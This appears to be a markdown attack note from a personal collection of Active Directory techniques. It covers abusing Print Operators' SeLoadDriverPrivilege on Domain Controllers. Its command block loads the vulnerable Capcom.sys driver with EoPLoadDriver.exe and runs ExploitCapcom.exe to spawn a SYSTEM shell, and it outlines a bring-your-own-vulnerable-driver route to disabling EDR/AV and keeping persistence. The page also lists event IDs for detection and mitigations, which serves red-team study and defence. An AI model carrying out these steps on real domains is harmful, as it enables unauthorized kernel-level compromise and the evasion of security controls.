attack-52-abusing-print-operators-group.md (2375B)
1 --- 2 title: "Attack #52 โ Abusing Print Operators Group" 3 description: "whoami /priv" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "privilege-escalation"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ฃ Attack #52 โ Abusing Print Operators Group.md" 11 --- 12 # ๐ฃ Attack #52 โ Abusing Print Operators Group 13 14 *** 15 16 ## ๐ How It Works 17 18 **Print Operators** can log on to Domain Controllers and manage printers. More importantly, they have the `SeLoadDriverPrivilege` โ the ability to **load kernel drivers** into the operating system. This can be abused to load a malicious driver that grants SYSTEM access or disables security controls. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in Print Operators** | Provides SeLoadDriverPrivilege on DCs | 27 28 *** 29 30 ## ๐ป Full Commands 31 32 ```powershell 33 # โโ Verify privilege โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 34 whoami /priv 35 # SeLoadDriverPrivilege Load and unload device drivers Enabled 36 37 # โโ EoPLoadDriver exploit (load Capcom.sys for kernel execution) โโโโโโโโโโโโโโ 38 .\EoPLoadDriver.exe System\CurrentControlSet\MyDriver .\Capcom.sys 39 .\ExploitCapcom.exe 40 # Spawns SYSTEM shell 41 42 # โโ Alternative: load vulnerable driver for BYOVD attack โโโโโโโโโโโโโโโโโโโโโ 43 # Bring Your Own Vulnerable Driver โ load a signed but vulnerable driver 44 # Then exploit it for kernel-level code execution 45 ``` 46 47 *** 48 49 ## ๐ก๏ธ Detection โ Event IDs 50 51 | Event ID | Source | What to Look For | 52 |---|---|---| 53 | **4672** | Security Log | SeLoadDriverPrivilege assigned | 54 | **7045** | System Log | Driver loaded | 55 | **Sysmon 6** | Sysmon | Driver loaded โ filter for non-standard drivers | 56 57 *** 58 59 ## ๐ Attack Chain Context 60 61 ``` 62 [Print Operators] โโโ SeLoadDriverPrivilege โ load kernel driver โ SYSTEM 63 โ 64 โโโโ ๐ Kernel driver โ disable EDR/AV โ undetected persistence 65 โโโโ ๐ Defeated by: empty Print Operators group, driver signing enforcement 66 ``` 67 68 *** 69 70 > โ **Attack #52 โ Print Operators complete.**